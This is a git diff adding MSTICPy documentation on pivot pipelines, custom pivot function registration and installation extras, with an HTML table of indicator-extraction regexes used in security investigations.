+is a simple text or regular expression filter that matches and returns
+only rows with the specified patterns. If you know the exact columns that
+you need to filter on, and particularly if the dataset is large, you should
+use pandas native query functions like ``query`` or boolean filtering.
+However, the filter accessor can be useful for quick and dirty uses.
+
+The ``expr`` parameter can be a string, a regular expression or a number. In
+the former two cases the expression is matched against all string (or pandas object)
+columns. The matching is not case-sensitive by default but you can force this
+by specifying ``match_case=True``.
+
+If ``expr`` is a number, it is matched against numeric columns. However, it is matched
+as a string. The value of the ``expr`` parameter is converted to a string and all
+of the DataFrame columns of type "number" are converted to strings. Any row
+with a number that partially matches will be returned. For example, ``expr=462`` will
+match 4624 and 4625 from the numeric EventID columns in Windows Security event
+data.
+
+You can also specify a regular expression string to match numeric columns by
+adding the ``numeric_col=True`` parameter. Using ``expr="462[4-7]", numeric_col=True``
+will match numbers in the range 4624-4627.
+
+mp_pivot.filter_cols
+~~~~~~~~~~~~~~~~~~~~
+
+:py:meth:`mp_pivot.filter_cols<msticpy.datamodel.pivot_pd_accessor.PivotAccessor.filter_cols>`
+lets you filter the columns in the pipeline.
+
+The ``cols`` parameter can be a string (single column) or a list of strings (multiple
+columns). Each item can also be a regular expression to let you match groups of
+related column names (e.g. "Target.*").
+
+The ``match_case`` parameter (False by default) forces case-sensitve matching on
+exact or regular expression matching of column names.
+
+The ``sort_columns`` parameter will sort the columns alphabetically in the
+output DataFrame - the default is to preserve the input column order.
+
+mp_pivot.sort
+~~~~~~~~~~~~~
+
+:py:meth:`mp_pivot.sort<msticpy.datamodel.pivot_pd_accessor.PivotAccessor.sort>`
+lets you sort the output DataFrame by one or more columns.
+
+The ``cols`` parameter specifies which columns to sort by. This can be a single
+column name, a string containing a comma-separated list of column names, a
+Python list of column names or a Python dictionary of column_name-boolean pairs.
+
+Column names are matched in the following sequence:
+
+-  exact matches
+-  case-insensivitve matches
+-  regular expressions
+
+Where a column regular expression matches more than one column, all matched
+columns will be added to the column sorting order.
+
+In the case of the string and list types you can add a ":desc" or ":asc" suffix
+to the name (no spaces) to indicated descending or ascending sort order.
+Ascending is the default so you typically do not need to add the ":asc" suffix
+except for reasons of clarity.
+
+You can also control the sorting behavior of individual columns by passing
+a dict as the ``cols`` parameter. The keys of the dict are the column names
+and the value is a boolean: True means ascending, False means descending.
+
+Column sorting priority is controlled by the order in which you specify
+the column names/expressions in the ``cols`` parameter. E.g.
+``cols="colA:desc, colB:asc"`` will sort by colA descending, then by colB, ascending.
+
+You can also force a single ordering for all columns with the ``ascending``
+parameter - this will override any column-specific settings.
+
+
+
+Example pipeline
+~~~~~~~~~~~~~~~~
+
+The example below shows the use of mp_pivot.run and mp_pivot.display.
+
+This takes an existing DataFrame - suspcious_ips - and:
+
+-  checks for threat intelligence reports on any of the IP addresses
+-  uses pandas ``query`` function to filter only the high severity hits
+-  calls the whois pivot function to obtain ownership information for these IPs
+   (note that we join the results of the previous step here usine ``join='left'``
+   so our output will be all TI result data plus whois data)
+-  displays a sample of the combined output
+-  uses ``tee`` to save a snapshot to a DF variable *ti_whois_df*
+-  calls a pivot data query (AzureSentinel.list_aad_signins_for_ip) to check
+   for Azure Active Directory logins that
+   have an IP address source that matches any of these addresses.
+
+The final step uses another *MSTICPy* pandas extension to plot the login attempts
+on a timeline chart.
+
+.. code:: ipython3
+
+    (
+        suspicious_ips
+        # Lookup IPs at VT
+        .mp_pivot.run(IpAddress.ti.lookup_ipv4_VirusTotal, column="IPAddress")
+        # Filter on high severity
+        .query("Severity == 'high'")
+        # lookup whois info for IPs
+        .mp_pivot.run(IpAddress.util.whois, column="Ioc", join="left")
+        # display sample of intermediate results
+        .mp_pivot.display(title="TI High Severity IPs", cols=["Ioc", "Provider", "Reference"], head=5)
+        .mp_pivot.tee(var_name="ti_whois_df")
+        # Query IPs that have login attempts
+        .mp_pivot.run(IpAddress.AzureSentinel.list_aad_signins_for_ip, ip_address_list="Ioc")
+        # Send the output of this to a plot
+        .mp_timeline.plot(
+            title="High Severity IPs with Logon attempts",
+            source_columns=["UserPrincipalName", "IPAddress", "ResultType", "ClientAppUsed", "UserAgent", "Location"],
+            group_by="UserPrincipalName"
+        )
+    )
+
+An sample of the results you would see from this pipeline.
+
+.. figure:: _static/pivot_pipeline.png
+   :alt: Output from MSTICPy pivot and pandas pipeline showing timeline of login attempts.
+   :height: 6in
+
+
+Creating custom pipelines as YAML files
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can define a pipeline as a YAML file, then import and execute it
+using your chosen input DataFrame.
+
+The format of the pipeline YAML file is shown below, illustrating
+the definitions for the different pipeline types described earlier.
+
+.. code:: yaml
+
+    pipelines:
+      pipeline1:
+        description: Pipeline 1 description
+        steps:
+          - name: get_logons
+            step_type: pivot
+            function: util.whois
+            entity: IpAddress
+            comment: Standard pivot function
+            params:
+              column: IpAddress
+              join: inner
+          - name: disp_logons
+            step_type: pivot_display
+            comment: Pivot display
+            params:
+              title: "The title"
+              cols:
+                - Computer
+                - Account
+              query: Computer.str.startswith('MSTICAlerts')
+              head: 10
+          - name: tee_logons
+            step_type: pivot_tee
+            comment: Pivot tee
+            params:
+                var_name: var_df
+                clobber: True
+          - name: tee_logons_disp
+            step_type: pivot_tee_exec
+            comment: Pivot tee_exec with mp_timeline.plot
+            function: mp_timeline.plot
+            params:
+              source_columns:
+                - Computer
+                - Account
+          - name: logons_timeline
+            step_type: pd_accessor
+            comment: Standard accessor with mp_timeline.plot
+            function: mp_timeline.plot
+            pos_params:
+              - one
+              - 2
+            params:
+              source_columns:
+                - Computer
+                - Account
+      pipeline2:
+        description: Pipeline 2
+        steps:
+          - ...
+
+You can store multiple pipelines in a file. Each pipeline has one or
+more steps. The pipeline will be run in the order of the steps
+in the file.
+
+- ``name`` is the step name
+- ``step_type`` is one of:
+    - pivot
+    - display
+    - tee
+    - tee_exec
+    - pd_accessor
+- ``comment`` - optional comment to describe the step
+- ``function`` - see discussion below
+- ``pos_params`` - a list of positional parameters
+- ``params`` - a dictionary of keyword parameters and values
+
+The ``function`` parameter
+^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+This is the full name of the function to be executed. This is only needed for
+step types pivot, tee_exec and pd_accessor.
+
+In the pivot case it must
+be the full path to the pivot function from the entity (e.g. if you
+want to call IpAddress.util.whois, enter "util.whois" as the function
+name).
+
+In the case of tee_exec and pd_accessor this must be the name
+or path of the function as if it was being executed as a method of the
+DataFrame. For built-in DataFrame methods, such as ``sort_values`` or
+``query``, this is simply the function name. For custom accessor
+functions this must be the full dotted path. For example, *MSTICPy*
+has a custom accessor ``mp_timeline.plot()`` that plots the event
+timeline of events in a DataFrame. To invoke this use the full
+path of the function - "mp_timeline.plot".
+
+Reading a saved pipeline
+^^^^^^^^^^^^^^^^^^^^^^^^
+
+Assuming that you've saved the pipeline in a file "pipelines.yml"
+
+.. code:: ipython3
+
+    from msticpy.datamodel.pivot_pipeline import Pipeline
+
+    with open("pipelines.yml", "r") as pl_fh:
+        pl_txt = pl_fh.read()
+    pipelines = list(Pipeline.from_yaml(pl_txt))
+    print(pipelines[0].print_pipeline())
+
+.. parsed-literal::
+
+    # Pipeline 1 description
+    (
+        input_df
+        # Standard pivot function
+        .mp_pivot.run(IpAddress.util.whois, column='IpAddress', join='inner')
+        # Pivot display
+        .mp_pivot.display(title='The title', query='Computer.str.startswith('MSTICAlerts')', cols=['Computer', 'Account'], head=10)
+        # Pivot tee
+        .mp_pivot.tee(var_name='var_df', clobber=True)
+        # Pivot tee_exec with mp_timeline.plot
+        .mp_pivot.tee_exec('mp_timeline.plot', source_columns=['Computer', 'Account'])
+        # Standard accessor with mp_timeline.plot
+        .mp_timeline.plot('one', 2, source_columns=['Computer', 'Account'])
+    )
+
+Calling the
+:py:meth:`print_pipeline <msticpy.datamodel.pivot_pipeline.Pipeline.print_pipeline>`
+method prints out a representation of
+the pipeline as it would appear in code.
+
+See also :py:meth:`from_yaml <msticpy.datamodel.pivot_pipeline.Pipeline.from_yaml>`
+
+Running a pipeline
+^^^^^^^^^^^^^^^^^^
+
+To execute the pipeline call
+:py:meth:`run <msticpy.datamodel.pivot_pipeline.Pipeline.run>` on the
+pipeline object.
+You must supply a parameter ``data`` specifying the input DataFrame.
+Optionally, you can add ``verbose=True`` which will cause a progress bar
+and step details to be displayed as the pipeline is executed.
+
+
+Customizing and managing Pivots
+-------------------------------
+
+Adding custom functions to the pivot interface
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The pivot library supports adding functions as pivot functions from
+any importable Python library. Not all functions will be wrappable.
+Currently Pivot supports functions that take input parameters as
+either scalar values (I'm including strings in this although that isn't
+exactly correct) or dataframes with column specifications.
+
+If you have a library function that you want to expose as a pivot function
+you need to gather a bit of information about it.
+
+This table describes the configuration parameters needed to create a
+pivot function (most are optional).
+
++-------------------------+-------------------------------+------------+------------+
+| Item                    | Description                   | Required   | Default    |
++=========================+===============================+============+============+
+| src_module              | The src_module to containing  | Yes        | -          |
+|                         | the class or function         |            |            |
++-------------------------+-------------------------------+------------+------------+
+| class                   | The class containing function | No         | -          |
++-------------------------+-------------------------------+------------+------------+
+| src_func_name           | The name of the function to   | Yes        | -          |
+|                         | wrap                          |            |            |
++-------------------------+-------------------------------+------------+------------+
+| func_new_name           | Rename the function           | No         | -          |
++-------------------------+-------------------------------+------------+------------+
+| input type              | The input type that the       | Yes        | -          |
+|                         | wrapped function expects      |            |            |
+|                         | (dataframe iterable value)    |            |            |
++-------------------------+-------------------------------+------------+------------+
+| entity_map              | Mapping of entity and         | Yes        | -          |
+|                         | attribute used for function   |            |            |
++-------------------------+-------------------------------+------------+------------+
+| func_df_param_name      | The param name that the       | If DF      | -          |
+|                         | function uses as input param  | input      |            |
+|                         | for DataFrame                 |            |            |
++-------------------------+-------------------------------+------------+------------+
+| func_df_col_param_name  | The param name that function  | If DF      | -          |
+|                         | uses to identify the input    | input      |            |
+|                         | column name                   |            |            |
++-------------------------+-------------------------------+------------+------------+
+| func_out_column_name    | Name of the column in the     | If DF      | -          |
+|                         | output DF to use as a key to  | output     |            |
+|                         | join                          |            |            |
++-------------------------+-------------------------------+------------+------------+
+| func_static_params      | dict of static name/value     | No         | -          |
+|                         | params always sent to the     |            |            |
+|                         | function                      |            |            |
++-------------------------+-------------------------------+------------+------------+
+| func_input_value_arg    | Name of the param that the    | If not     | -          |
+|                         | wrapped function uses for its | DF input   |            |
+|                         | input value                   |            |            |
++-------------------------+-------------------------------+------------+------------+
+| can_iterate             | True if the function supports | No         | Yes        |
+|                         | being called multiple times   |            |            |
++-------------------------+-------------------------------+------------+------------+
+| entity_container_name   | The name of the container in  | No         | custom     |
+|                         | the entity where the func     |            |            |
+|                         | will appear                   |            |            |
++-------------------------+-------------------------------+------------+------------+
+
+The ``entity_map`` item specifies which entity or entities the pivot function
+will be added to. Each
+entry requires an Entity name (see
+:py:mod:`entities<msticpy.datamodel.entities>`) and an
+entity attribute name. The attribute name is only used if you want to
+use an instance of the entity as a parameter to the function.
+If you don't care about this you can pick any attribute.
+
+For ``IpAddress`` in the example
+below, the pivot function will try to extract the value of the
+``Address`` attribute when an instance of IpAddress is used as a
+function parameter.
+
+.. code:: yaml
+
+     entity_map:
+        IpAddress: Address
+        Host: HostName
+        Account: Name
+
+This means that you can specify different attributes of the same entity
+for different functions (or even for two instances of the same function)
+
+The ``func_df_param_name`` and ``func_df_col_param_name`` are needed
+only if the source function takes a dataframe and column name as input
+parameters.
+
+``func_out_column_name`` is relevant if the source function returns a
+dataframe. In order to join input data with output data this needs to be
+the column in the output that has the same value as the function input
+(e.g. if you are processing IP addresses and the column name in the
+output DF containing the IP is named “ip_addr”, put “ip_addr” here.)
+
+When you have this information, create or add this to a yaml file with
+the top-level element ``pivot_providers``.
+
+Example from the *MSTICPy* ip_utils ``who_is`` function
+
+.. code:: yaml
+
+   pivot_providers:
+     ...
+     who_is:
+      src_module: msticpy.sectools.ip_utils
+      src_func_name: get_whois_df
+      func_new_name: whois
+      input_type: dataframe
+      entity_map:
+        IpAddress: Address
+      func_df_param_name: data
+      func_df_col_param_name: ip_column
+      func_out_column_name: query
+      func_static_params:
+        all_columns: True
+        show_progress: False
+      func_input_value_arg: ip_address
+
+.. note:: the library also support creating pivots from ad hoc
+   functions created in the current notebook (see below).
+
+You can also put this function into a Python module.
+If your module is in the current directory and is called
+``my_new_module``, the value you specify for
+``src_module`` will be "my_new_module".
+
+Once you have your yaml definition file you can call
+:py:meth:`register_pivot_providers<msticpy.datamodel.pivot.Pivot.register_pivot_providers>`
+
+.. code:: python
+
+       Pivot.register_pivot_providers(
+           pivot_reg_path=path_to_your_yaml,
+           namespace=globals(),
+           def_container="my_container",
+           force_container=True
+       )
+
+.. warning:: this registration is not persistent. You will need to
+   call this each time you start a new session.
+
+
+Adding ad hoc pivot functions
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can also add ad hoc functions as pivot functions. This is
+probably a less common scenario but may be useful for testing and
+development.
+
+To do this use the Pivot method
+:py:meth:`add_pivot_function<msticpy.datamodel.pivot.Pivot.add_pivot_function>`
+
+You can either create a PivotRegistration object and supply that (along
+with the `func` parameter), to this method.
+
+.. code:: python
+
+    from msticpy.datamodel.pivot_register import PivotRegistration
+
+    def my_func(input: str):
+        return input.upper()
+
+    piv_reg = PivotRegistration(
+        input_type="value",
+        entity_map={"Host": "HostName"},
+        func_input_value_arg="input",
+        func_new_name="upper_name"
+    )
+
+    Pivot.add_pivot_function(my_func, piv_reg, container="change_case")
+
+
+Alernatively, you can supply the
+pivot registration parameters as keyword arguments:
+
+.. code:: python
+
+    def my_func(input: str):
+        return input.upper()
+
+    Pivot.add_pivot_function(
+        func=my_func,
+        container="change_case",
+        input_type="value",
+        entity_map={"Host": "HostName"},
+        func_input_value_arg="input",
+        func_new_name="upper_name",
+    )
+
+
+Creating and deleting shortcut pivot functions
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+If you are adding pivot functions of your own, you can add shortcuts
+(i.e. direct methods of the entity, rather than methods in sub-containers)
+to those functions.
+
+Every entity class has the class method
+:py:meth:`make_pivot_shortcut<msticpy.datamodel.entities.Entity.make_pivot_shortcut>`.
+You can use this to add a shortcut to an existing pivot function on that
+entity. Note that you must call this method on the entity *class* and not
+on an instance of that Entity.
+
+The parameters that you must supply are ``func_name`` and ``target``. The former
+is the relative path to the pivot function that you want to make the shortcut
+to, e.g. for ``IpAddress.util.whois`` you would use the string "util.whois".
+``target`` is the string name that you want the shortcut function to be called.
+This should be a valid Python identifier - a string starting with a letter or
+underscore, followed by any combination of letters, digits and underscores. If
+you supply a string that is not a valid identifier, the function will try to
+transform it into one.
+
+.. code:: ipython3
+
+    >>> IpAddress.make_pivot_shortcut(func_name="util.whois", target="my_whois")
+    >>> IpAddress.my_whois("157.53.1.1")
+
+.. parsed-literal::
+
+    ip_column    AsnDescription    whois_result
+    157.53.1.1   NA                {'nir': None, 'asn_registry': 'arin', ...
+
+
+If the shortcut function already exists, you will get an error (AttributeError).
+You can force overwriting of an existing shortcut by adding ``overwrite=True``.
+
+To delete a shortcut use
+:py:meth:`del_pivot_shortcut<msticpy.datamodel.entities.Entity.del_pivot_shortcut>`,
+giving the single parameter ``func_name`` with the name of the shortcut function
+you want to remove.
+
+
+Removing pivot functions from an entity or all entities
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Although not a common operation you can remove *all* pivot functions
+from an entity or from all entities.
+
+See
+:py:meth:`remove_pivot_funcs<msticpy.datamodel.pivot.Pivot.remove_pivot_funcs>`
+for more details.
\ No newline at end of file
diff --git a/docs/source/data_analysis/_static/EventClustering_1.png b/docs/source/data_analysis/_static/EventClustering_1.png
new file mode 100644
index 000000000..eb100b1c9
Binary files /dev/null and b/docs/source/data_analysis/_static/EventClustering_1.png differ
diff --git a/docs/source/data_analysis/_static/EventClustering_2a.png b/docs/source/data_analysis/_static/EventClustering_2a.png
new file mode 100644
index 000000000..4da1ae88b
Binary files /dev/null and b/docs/source/data_analysis/_static/EventClustering_2a.png differ
diff --git a/docs/source/data_analysis/_static/EventClustering_2b.png b/docs/source/data_analysis/_static/EventClustering_2b.png
new file mode 100644
index 000000000..1139b63f9
Binary files /dev/null and b/docs/source/data_analysis/_static/EventClustering_2b.png differ
diff --git a/docs/source/data_analysis/_static/EventClustering_3.png b/docs/source/data_analysis/_static/EventClustering_3.png
new file mode 100644
index 000000000..3f05b9500
Binary files /dev/null and b/docs/source/data_analysis/_static/EventClustering_3.png differ
diff --git a/docs/source/data_analysis/_static/EventClustering_4.png b/docs/source/data_analysis/_static/EventClustering_4.png
new file mode 100644
index 000000000..66c4c1771
Binary files /dev/null and b/docs/source/data_analysis/_static/EventClustering_4.png differ
diff --git a/docs/source/data_analysis/_static/EventClustering_5.png b/docs/source/data_analysis/_static/EventClustering_5.png
new file mode 100644
index 000000000..4095353dc
Binary files /dev/null and b/docs/source/data_analysis/_static/EventClustering_5.png differ
diff --git a/docs/source/data_analysis/_static/EventClustering_6.png b/docs/source/data_analysis/_static/EventClustering_6.png
new file mode 100644
index 000000000..8f712b13a
Binary files /dev/null and b/docs/source/data_analysis/_static/EventClustering_6.png differ
diff --git a/docs/source/data_analysis/_static/EventClustering_7.png b/docs/source/data_analysis/_static/EventClustering_7.png
new file mode 100644
index 000000000..4a450cb2c
Binary files /dev/null and b/docs/source/data_analysis/_static/EventClustering_7.png differ
diff --git a/docs/source/data_analysis/_static/aws.png b/docs/source/data_analysis/_static/aws.png
new file mode 100644
index 000000000..6dc209c0c
Binary files /dev/null and b/docs/source/data_analysis/_static/aws.png differ
diff --git a/docs/source/data_analysis/_static/exchange.png b/docs/source/data_analysis/_static/exchange.png
new file mode 100644
index 000000000..438728e35
Binary files /dev/null and b/docs/source/data_analysis/_static/exchange.png differ
diff --git a/docs/source/data_analysis/_static/exchange1.png b/docs/source/data_analysis/_static/exchange1.png
new file mode 100644
index 000000000..4114ba05d
Binary files /dev/null and b/docs/source/data_analysis/_static/exchange1.png differ
diff --git a/docs/source/data_analysis/_static/pivot_browser.png b/docs/source/data_analysis/_static/pivot_browser.png
new file mode 100644
index 000000000..272a298df
Binary files /dev/null and b/docs/source/data_analysis/_static/pivot_browser.png differ
diff --git a/docs/source/data_analysis/_static/pivot_pipeline.png b/docs/source/data_analysis/_static/pivot_pipeline.png
new file mode 100644
index 000000000..a4a619a26
Binary files /dev/null and b/docs/source/data_analysis/_static/pivot_pipeline.png differ
diff --git a/docs/source/data_analysis/_static/pivot_query_time.png b/docs/source/data_analysis/_static/pivot_query_time.png
new file mode 100644
index 000000000..a08cafc9d
Binary files /dev/null and b/docs/source/data_analysis/_static/pivot_query_time.png differ
diff --git a/docs/source/data_analysis/_static/vm.png b/docs/source/data_analysis/_static/vm.png
new file mode 100644
index 000000000..e6bc5da1e
Binary files /dev/null and b/docs/source/data_analysis/_static/vm.png differ
diff --git a/docs/source/data_analysis/table.html b/docs/source/data_analysis/table.html
new file mode 100644
index 000000000..b3af2cee5
--- /dev/null
+++ b/docs/source/data_analysis/table.html
@@ -0,0 +1,44 @@
+<head></head>
+<body>
+<table border="1">
+    <thead>
+      <tr style="text-align: right;">
+        <th>IoCType</th>
+        <th>Regex</th>
+      </tr>
+    </thead>
+    <tbody>
+      <tr>
+        <td>ipv4</td>
+        <td><pre>(?P&lt;ipaddress>(?:[0-9]{1,3}\\.){3}[0-9]{1,3})</pre></td>
+      </tr>
+      <tr>
+        <td>ipv6</td>
+        <td><pre>(?&lt;![:.\\w])(?:[A-F0-9]{1,4}:){7}[A-F0-9]{1,4}(?![:.\\w])</pre></td>
+      </tr>
+      <tr>
+        <td>dns</td>
+        <td><pre>((?=[a-z0-9-]{1,63}\\.)[a-z0-9]+(-[a-z0-9]+)*\\.){2,}[a-z]{2,63}</pre></td>
+      </tr>
+      <tr>
+        <td>url</td>
+        <td><pre>
+(?P<protocol>(https?|ftp|telnet|ldap|file)://)
+(?P<userinfo>([a-z0-9-._~!$&\\'()*+,;=:]|%[0-9A-F]{2})*@)?
+(?P<host>([a-z0-9-._~!$&\\'()*+,;=]|%[0-9A-F]{2})*)
+        </pre></td>
+      </tr>
+      <tr>
+        <td>windows_path</td>
+        <td><pre>
+(?P<root>[a-z]:|\\\\\\\\[a-z0-9_.$-]+||[.]+)
+(?P<folder>\\\\(?:[^\\/:*?"\\\'<>|\\r\\n]+\\\\)*)
+(?P<file>[^\\\\/*?""<>|\\r\\n ]+)
+        </pre></td>
+      </tr>
+      <tr>
+        <td>ipv4</td>
+        <td><pre>'(?P<ipaddress>(?:[0-9]{1,3}\\.){3}[0-9]{1,3})'<pre></td>
+      </tr>
+    </table>
+</body>
\ No newline at end of file
diff --git a/docs/source/getting_started/Installing.rst b/docs/source/getting_started/Installing.rst
new file mode 100644
index 000000000..d27e41871
--- /dev/null
+++ b/docs/source/getting_started/Installing.rst
@@ -0,0 +1,187 @@
+Installing
+==========
+
+
+Python 3.6 or Later
+-------------------
+
+*MSTICPy* requires Python 3.6 or later.
+If you are running in hosted environment such as Azure Notebooks,
+Python is already installed. Please ensure that the Python 3.6 (or later)
+kernel is selected for your notebooks.
+
+If you are running the notebooks locally, you will need to install Python 3.6
+or later. The Ananconda distribution is a good starting point since it comes
+with many of packages required by *MSTICPy* pre-installed.
+
+Creating a virtual environment
+------------------------------
+
+.. note:: This is an optional step. You will most likely want to do this
+   if you are installing *MSTICPy* in a local Python installation. If
+   you are using a cloud notebook environment such as Azure ML you
+   will usually not need to create a virtual environment.
+
+*MSTICPy* has a significant number of dependencies. To avoid conflicts
+with packages in your existing Python environment you may want to
+create a Python virtual environment
+or a conda environment and install the package there.
+
+For standard python use the ``venv`` command to do this
+(there are also several alternatives to venv available).
+
+.. code:: bash
+
+    ~$ python -m venv my_env
+    ~$ ./my_env/scripts/activate
+    (my_env) ~$
+
+For Conda use the conda ``create`` command from a conda shell.
+
+.. code:: bash
+
+    (base) c:\users\ian> conda create -n my_env
+    (base) c:\users\ian> conda activate my_env
+    (my_env) c:\users\ian>
+
+You should see the name of the environment that you've just
+created and activated in the prompt.
+
+
+Installation
+------------
+
+Run the following command to install the base configuation of *MSTICPy*.
+
+
+``pip install msticpy``
+
+or for the latest dev build
+
+``pip install git+https://github.com/microsoft/msticpy``
+
+
+Selective Installation - using "extras"
+---------------------------------------
+
+pip supports specification of an additional parameter sequence
+known as extras. The syntax for this is:
+
+``pip install package_name[extra1,extra2,...]``
+
+As of version 0.9.0 *MSTICPy* has its dependencies split into
+extras. This allows you to install only the packages that you
+need and avoid the overhead of time and diskspace of dependencies
+that you do not need.
+
+.. note:: extras do not affect the which code from *MSTICPy* is
+   installed - only the external libraries on which certain
+   functions inside *MSTICPy* need to work.
+
+.. warning:: the core install no longer includes the
+   **Azure** libraries and only a limited install of the Kqlmagic package
+   used for most Azure Sentinel data queries. If you are an Azure Sentinel
+   user, you should always install with the "azsentinel" extra.
+
+Extras in *MSTICPy*
+~~~~~~~~~~~~~~~~~~~
+
+The extras available in *MSTICPy* are described in the following table:
+
++------------------+------------------------------------+--------------+--------------+
+| extra            | Functionality                      | Install time | Install time |
+|                  |                                    | (increment)  | (full)       |
++==================+====================================+==============+==============+
+| [none]           | - Most functionality (approx 75%)  |       --     |   1m:13s     |
+|                  | - Kqlmagic Jupyter basic           |              |              |
++------------------+------------------------------------+--------------+--------------+
+| keyvault         | - Key Vault and keyring storage of |       5s     |   1m:18s     |
+|                  |   settings secrets                 |              |              |
++------------------+------------------------------------+--------------+--------------+
+| azure            | - Azure API data retrieval         |   1m:36s     |   2m:50s     |
+|                  |   (subs, resources, Vms, etc.)     |              |              |
+|                  | - Azure storage APIs               |              |              |
+|                  | - Azure Sentinel APIs (not data    |              |              |
+|                  |   query)                           |              |              |
+|                  | - Also includes "keyvault"         |              |              |
++------------------+------------------------------------+--------------+--------------+
+| kql              | - Azure Sentinel data queries      |   2m:07s     |   3m:20s     |
+|                  | - Kqlmagic Jupyter extended        |              |              |
++------------------+------------------------------------+--------------+--------------+
+| azsentinel       | - Combination of core install      |   3m:48s     |   5m:00s     |
+|                  |   plus "azure", "keyvault" and     |              |              |
+|                  |   "kql"                            |              |              |
++------------------+------------------------------------+--------------+--------------+
+| ml               | - Timeseries analysis              |      29s     |   1m:42s     |
+|                  | - Event clustering                 |              |              |
+|                  | - Outlier analysis                 |              |              |
++------------------+------------------------------------+--------------+--------------+
+| splunk           | - Splunk data queries              |       3s     |   1m:16s     |
++------------------+------------------------------------+--------------+--------------+
+| vt3              | - VirusTotal V3 graph API          |       4s     |   1m:17s     |
+|                  |   (default VT lookup is included   |              |              |
+|                  |   in base install)                 |              |              |
++------------------+------------------------------------+--------------+--------------+
+| riskiq           | - RiskIQ Illuminate threat intel   |       6s     |   1m:19s     |
+|                  |   provider & pivot functions       |              |              |
++------------------+------------------------------------+--------------+--------------+
+| all              | - Includes all of above packages   |   4m:00s     |   5m:29s     |
++------------------+------------------------------------+--------------+--------------+
+| dev              | - Development tools plus "base"    |   1m:17s     |   2m:30s     |
++------------------+------------------------------------+--------------+--------------+
+| test             | - "dev" plus "all"                 |   4m:20s     |   5m:50s     |
++------------------+------------------------------------+--------------+--------------+
+
+The installation times here are meant to be indicative of comparative
+times for installation - they will vary depending on the performance of
+your computer and network.
+
+The *Install time (increment)* column shows times relative to
+the base install (i.e. assuming you've already run ``pip install msticpy``).
+The *Install time (full)* column shows the time to install the base
+plus extra. Both columns assume that the following packages are already
+installed: jupyter, pandas and matplotlib.
+
+If you do not specify an "extra" in your pip install command, the base
+dependencies for *MSTICPy* will be installed. This has a lot of functionality
+such as networking, pivoting, visualization but excludes most dependencies
+that are specific to a particular data environment like Azure Sentinel or
+Splunk.
+
+Some of the extras, like "all" and "azsentinel" are combinations of
+other options collected together as a convenience. You can also specify
+multiple extras during install, separating them with commas.
+
+.. code:: bash
+
+    pip install msticpy[azure,kql]
+
+.. warning:: when specifying multiple extras, do not leave spaces between
+   the options - just separate with commas.
+
+Missing "extra" exceptions
+^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+If you try to use functionality for a component that needs a dependency
+that you have not installed you will usually get an informative
+exception message telling you which "extra" option you need to use
+to enable that feature.
+
+
+.. figure:: _static/extra_exception.png
+   :alt: Exception when trying to use a function that is not installed.
+   :height: 3in
+
+To fix this simply run pip install with the "extra" option shown in the
+exception message:
+
+.. code:: bash
+
+    pip install msticpy[ml]
+
+.. note:: In some cases you many not get an informative error. We've
+   tried to trap all of the cases but if
+   experience a problem with some *MSTICPy* functionality (especially
+   an *ImportError* exception, make sure
+   that you have installed the *extra* that corresponds to the
+   functionality you are trying to use.
diff --git a/docs/source/getting_started/Introduction.rst b/docs/source/getting_started/Introduction.rst
new file mode 100644
index 000000000..968bfb4bd
--- /dev/null
+++ b/docs/source/getting_started/Introduction.rst
@@ -0,0 +1,29 @@
+Introduction
+============
+
+*msticpy* is a set of Python tools intended to be used for security
+investigations and hunting.
+Many of the tools originated as code Jupyter notebooks written to
+solve a problem as part of a security investigation. Some
+of tools them are only useful in notebooks (e.g. much of the nbtools
+sub-package) but many others can be used from the Python commandline
+or imported into your code.
+
+The package addresses three central needs for security investigators
+and hunters:
+
+-  Acquiring and enriching data
+-  Analyzing data
+-  Visualizing data
+
+
+Use Cases and Environments
+--------------------------
+
+Although *msticpy* was originally developed for use with Azure Sentinel,
+much of the package is agnostic to the data source. Data query components
+for Splunk, Microsoft 365 Defender Advanced, Microsoft Graph and others
+are also included.
+
+The tool APIs typically accept a pandas DataFrame as input and, where
+appropriate, return output as a DataFrame.
diff --git a/docs/source/getting_started/JupyterAndAzureSentinel.rst b/docs/source/getting_started/JupyterAndAzureSentinel.rst
new file mode 100644
index 000000000..9629de42d
--- /dev/null
+++ b/docs/source/getting_started/JupyterAndAzureSentinel.rst
@@ -0,0 +1,211 @@
+Jupyter, msticpy and Azure Sentinel
+===================================
+
+Creating a notebooks project within `Azure
+Notebooks <https://notebooks.azure.com/>`__ is directly supported by
+Azure Sentinel. Click on the notebook icon in the Azure Sentinel main
+navigation menu. From here you have the option to create a new project
+from our GitHub repo or just open your existing Azure Notebooks project.
+Azure Notebooks is a
+`Jupyterhub <https://jupyterhub.readthedocs.io/en/stable/>`__
+implementation and has a free tier that you can use for any notebook
+tasks.
+
+.. figure:: _static/SentinelGettingStarted.png
+   :alt: Accessing the Notebooks section of Azure Sentinel user interface.
+
+   Accessing the Notebooks section of Azure Sentinel user interface.
+
+If you have a local installation of Python 3.6 or later, you can also
+download the notebooks and run these locally. My personal recommendation
+is to use the `Anaconda <https://www.anaconda.com/distribution/>`__
+distribution since it contains the Jupyter packages and many others
+needed for the Azure Sentinel notebooks.
+
+Further reading: `Using Notebooks in Azure
+Sentinel <https://docs.microsoft.com/azure/sentinel/notebooks>`__
+and .
+
+Open one of the Sample Notebooks
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+If you have cloned the Azure Sentinel repo you already have several
+notebooks in your Notebooks for Azure Project -- in the notebooks and
+notebooks/samples folders. Most of the notebooks in the samples folders
+(anything that begins with "Example") have data is saved with them so
+you can the expected output without having access to a data source. I
+strongly recommend viewing the notebook using nbviewer.org. This seems
+to have magical powers to render data and interactive JavaScript
+controls that are displayed incorrectly even when viewing a notebook
+locally. The GitHub notebook viewer is reasonable for simple notebooks
+but not very sophisticated. Here is a link to one of the notebooks
+displayed in
+`nbviewer <https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Step-by-Step%20Linux-Windows-Office%20Investigation.ipynb>`__.
+
